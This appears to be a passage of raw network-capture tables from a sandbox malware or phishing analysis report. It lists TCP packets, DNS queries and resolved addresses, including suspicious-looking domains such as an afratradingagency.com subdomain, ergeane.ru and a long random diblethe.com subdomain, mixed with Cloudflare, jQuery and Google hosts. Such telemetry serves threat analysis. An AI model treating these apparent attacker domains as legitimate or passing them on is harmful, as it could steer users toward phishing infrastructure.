                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.311028957 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.320760965 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.320832014 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.320857048 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.321456909 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.321544886 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.321559906 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.328080893 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.328138113 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.328155041 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.328315973 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.328424931 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.328437090 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.329523087 CET44349873142.250.181.46192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:48.329729080 CET49873443192.168.2.16142.250.181.46
                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:40.180979967 CET53635851.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:40.185456991 CET53586281.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:40.743654966 CET5060453192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:40.744075060 CET5796153192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.294812918 CET53579611.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.295377970 CET53506041.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.004832983 CET53532841.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.136418104 CET5273953192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.136606932 CET5404953192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.282815933 CET53540491.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.282829046 CET53527391.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.495207071 CET5250053192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.495497942 CET5484553192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.657021999 CET53548451.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.657500029 CET53525001.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.692687035 CET6296353192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.692943096 CET5800153192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.832119942 CET53629631.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.832199097 CET53580011.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.914701939 CET5683053192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.914992094 CET5317453192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.924478054 CET6345753192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.924631119 CET6268653192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.078404903 CET53531741.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.078903913 CET53626861.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.079875946 CET53634571.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.079941034 CET53568301.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:59.811634064 CET53573561.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.649450064 CET6454453192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.649667025 CET5280053192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.183167934 CET53645441.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.183216095 CET53528001.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:14.453696012 CET5446853192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:14.453833103 CET5075653192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:14.590486050 CET53507561.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:14.590671062 CET53544681.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.685868025 CET6343153192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.686188936 CET5020053192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.822798967 CET53502001.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.823748112 CET53634311.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.870265007 CET53587011.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:17.255847931 CET6311553192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:17.256103992 CET6202653192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:17.398471117 CET53631151.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:17.399542093 CET53620261.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:18.518059969 CET53573711.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:22.802748919 CET5622653192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:22.802869081 CET6058053192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:22.941376925 CET53562261.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:22.947053909 CET53605801.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:27.908216953 CET6282453192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:27.908417940 CET5275153192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:28.249511957 CET53628241.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:28.250205994 CET53527511.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.795871019 CET6409953192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.796015024 CET6464353192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.796319962 CET5636153192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.796437025 CET6036653192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.933804989 CET53563611.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.933900118 CET53640991.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.934039116 CET53646431.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.934148073 CET53603661.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:39.675862074 CET138138192.168.2.16192.168.2.255
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:40.005681992 CET53596191.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:41.070873976 CET53573771.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:41.075748920 CET53579091.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:45.587424040 CET53615561.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:45.661329031 CET53574781.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:47.282839060 CET53597251.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:52.352427006 CET6372053192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:52.352607012 CET5511853192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:52.490242958 CET53551181.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:52.492554903 CET53637201.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:57.074531078 CET5469953192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:57.074672937 CET6122153192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:57.253360033 CET53546991.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:57.253372908 CET53612211.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:57.373775959 CET53632421.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:01.482994080 CET6491953192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:01.483136892 CET5210153192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:01.620069981 CET53649191.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:01.620110035 CET53521011.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:02.350917101 CET4965953192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:02.351181984 CET6104953192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:02.494034052 CET53496591.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:02.494421005 CET53610491.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:12.128613949 CET53627871.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:18.281898022 CET5947953192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:18.282079935 CET5263253192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:18.419554949 CET53594791.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:18.423074961 CET53526321.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:24.036750078 CET6169853192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:24.036899090 CET4920753192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:24.173302889 CET53616981.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:24.174338102 CET53492071.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.164119959 CET5467753192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.294859886 CET53579641.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.300946951 CET53546771.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.325484037 CET53630261.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.325696945 CET53549691.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.365593910 CET53527521.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.571413040 CET5744753192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.571784973 CET6451353192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.576406956 CET5302753192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.576579094 CET6288753192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.708967924 CET53574471.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.709018946 CET53645131.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.713340044 CET53530271.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.714703083 CET53628871.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:35.239067078 CET53537301.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:35.837331057 CET53589941.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.065109968 CET5724253192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.065475941 CET6075653192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.206448078 CET53572421.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.207519054 CET53607561.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.209754944 CET4955153192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.209875107 CET6222553192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.347678900 CET53622251.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.348151922 CET53495511.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:41.441509008 CET53568471.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.078716040 CET5936053192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.078896046 CET5009953192.168.2.161.1.1.1
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.216351986 CET53593601.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.216367006 CET53500991.1.1.1192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:46.600419998 CET53573641.1.1.1192.168.2.16
                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:40.743654966 CET192.168.2.161.1.1.10x9588Standard query (0)52kz793.afratradingagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:40.744075060 CET192.168.2.161.1.1.10xf42bStandard query (0)52kz793.afratradingagency.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.136418104 CET192.168.2.161.1.1.10x65caStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.136606932 CET192.168.2.161.1.1.10xb496Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.495207071 CET192.168.2.161.1.1.10xa64Standard query (0)52kz793.afratradingagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.495497942 CET192.168.2.161.1.1.10xbe58Standard query (0)52kz793.afratradingagency.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.692687035 CET192.168.2.161.1.1.10x429aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.692943096 CET192.168.2.161.1.1.10xb40fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.914701939 CET192.168.2.161.1.1.10xd07fStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.914992094 CET192.168.2.161.1.1.10xa458Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.924478054 CET192.168.2.161.1.1.10xe284Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:46.924631119 CET192.168.2.161.1.1.10xa199Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.649450064 CET192.168.2.161.1.1.10xa453Standard query (0)32.ergeane.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:09.649667025 CET192.168.2.161.1.1.10xe664Standard query (0)32.ergeane.ru65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:14.453696012 CET192.168.2.161.1.1.10x9e81Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:14.453833103 CET192.168.2.161.1.1.10x4eacStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.685868025 CET192.168.2.161.1.1.10xa466Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.686188936 CET192.168.2.161.1.1.10x59aaStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:17.255847931 CET192.168.2.161.1.1.10xb2f3Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:17.256103992 CET192.168.2.161.1.1.10x61f3Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:22.802748919 CET192.168.2.161.1.1.10x6499Standard query (0)cdn.prod.website-files.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:22.802869081 CET192.168.2.161.1.1.10x7c35Standard query (0)cdn.prod.website-files.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:27.908216953 CET192.168.2.161.1.1.10xcc57Standard query (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:27.908417940 CET192.168.2.161.1.1.10xe825Standard query (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.795871019 CET192.168.2.161.1.1.10x9fe2Standard query (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.796015024 CET192.168.2.161.1.1.10xe88cStandard query (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.796319962 CET192.168.2.161.1.1.10xaa62Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:31.796437025 CET192.168.2.161.1.1.10x3f29Standard query (0)docs.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:52.352427006 CET192.168.2.161.1.1.10x1126Standard query (0)accounts.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:52.352607012 CET192.168.2.161.1.1.10xbe68Standard query (0)accounts.youtube.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:57.074531078 CET192.168.2.161.1.1.10x4980Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:57.074672937 CET192.168.2.161.1.1.10xc1d7Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:01.482994080 CET192.168.2.161.1.1.10x26b4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:01.483136892 CET192.168.2.161.1.1.10x8bf3Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:02.350917101 CET192.168.2.161.1.1.10xf138Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:02.351181984 CET192.168.2.161.1.1.10xacaeStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:18.281898022 CET192.168.2.161.1.1.10xcc60Standard query (0)cdn.prod.website-files.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:18.282079935 CET192.168.2.161.1.1.10xf6c2Standard query (0)cdn.prod.website-files.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:24.036750078 CET192.168.2.161.1.1.10x878Standard query (0)support.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:24.036899090 CET192.168.2.161.1.1.10xab49Standard query (0)support.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.164119959 CET192.168.2.161.1.1.10x3159Standard query (0)lh3.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.571413040 CET192.168.2.161.1.1.10x2799Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.571784973 CET192.168.2.161.1.1.10xeb5eStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.576406956 CET192.168.2.161.1.1.10x597aStandard query (0)support.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:32.576579094 CET192.168.2.161.1.1.10xf66cStandard query (0)support.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.065109968 CET192.168.2.161.1.1.10x6323Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.065475941 CET192.168.2.161.1.1.10x7bb9Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.209754944 CET192.168.2.161.1.1.10x1c2cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:40.209875107 CET192.168.2.161.1.1.10xe1eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.078716040 CET192.168.2.161.1.1.10x1d2fStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:29:45.078896046 CET192.168.2.161.1.1.10xbd19Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.295377970 CET1.1.1.1192.168.2.160x9588No error (0)52kz793.afratradingagency.com192.185.195.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.282815933 CET1.1.1.1192.168.2.160xb496No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.282829046 CET1.1.1.1192.168.2.160x65caNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.282829046 CET1.1.1.1192.168.2.160x65caNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.657500029 CET1.1.1.1192.168.2.160xa64No error (0)52kz793.afratradingagency.com192.185.195.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.832119942 CET1.1.1.1192.168.2.160x429aNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:44.832199097 CET1.1.1.1192.168.2.160xb40fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.078404903 CET1.1.1.1192.168.2.160xa458No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.078903913 CET1.1.1.1192.168.2.160xa199No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.079875946 CET1.1.1.1192.168.2.160xe284No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.079875946 CET1.1.1.1192.168.2.160xe284No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.079941034 CET1.1.1.1192.168.2.160xd07fNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:47.079941034 CET1.1.1.1192.168.2.160xd07fNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.183167934 CET1.1.1.1192.168.2.160xa453No error (0)32.ergeane.ru104.21.32.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.183167934 CET1.1.1.1192.168.2.160xa453No error (0)32.ergeane.ru172.67.156.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:10.183216095 CET1.1.1.1192.168.2.160xe664No error (0)32.ergeane.ru65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:14.590671062 CET1.1.1.1192.168.2.160x9e81No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:14.590671062 CET1.1.1.1192.168.2.160x9e81No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:14.590671062 CET1.1.1.1192.168.2.160x9e81No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:14.590671062 CET1.1.1.1192.168.2.160x9e81No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.823748112 CET1.1.1.1192.168.2.160xa466No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.823748112 CET1.1.1.1192.168.2.160xa466No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.823748112 CET1.1.1.1192.168.2.160xa466No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:16.823748112 CET1.1.1.1192.168.2.160xa466No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:17.398471117 CET1.1.1.1192.168.2.160xb2f3No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:22.941376925 CET1.1.1.1192.168.2.160x6499No error (0)cdn.prod.website-files.com104.18.161.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:22.941376925 CET1.1.1.1192.168.2.160x6499No error (0)cdn.prod.website-files.com104.18.160.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:22.947053909 CET1.1.1.1192.168.2.160x7c35No error (0)cdn.prod.website-files.com65IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:28.249511957 CET1.1.1.1192.168.2.160xcc57No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 18, 2024 20:28:28.249511957 CET1.1.1.1192.168.2.160xcc57No error (0)5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com104.21.16.1A (IP address)IN (0x0001)false
